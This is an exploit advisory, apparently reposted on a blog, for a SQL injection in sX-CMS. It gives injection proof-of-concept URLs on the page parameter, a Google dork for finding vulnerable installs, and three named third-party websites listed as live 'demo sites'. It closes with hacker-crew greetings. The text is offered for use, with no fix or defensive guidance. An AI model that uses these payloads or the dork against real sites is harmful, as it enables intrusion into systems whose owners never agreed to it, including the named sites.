sX-CMS <= SQL injection Vulnerability

##################################################
# Exploit Title: sX-CMS <= SQL injection Vulnerability
# Date: 06/04/2012
# Author: Ryuzaki Lawlet
# Web/Blog: http://justryuz.blogspot.com
# Category: webapps
# version: -
# Vendor or Software Link: http://www.source-worx.de/
# Google dork: powered by sX-CMS
# Tested on: Linux
##################################################
[~]Exploit/p0c :

http://localhost:80/cms/index/page/_9'
http://localhost:80/cms/index.php?page='9

[~]Demo site:

http://www.general-aero.com/cms/cms/index/page/_9'
http://www.naturel-europe.de/cms/index/page/_9'
http://www.cycletec.de/cms/index.php?page=-9'


FB : www.fb.me/justryuz
+---------------------------------------------------+
  Greetz to :
[ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,]
[ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC ]
[ And all my Freinds + Malaysian + Indonesia + Gaza & Turki ]
-----------------------------------------------------+
 

 CyberSEC © 2012 All rights reserved.

Tweet

Postingan terkait:

Ditulis Ryuzaki — Thursday, April 5, 2012 — Add Comment — exploit, iNFO, sekuriti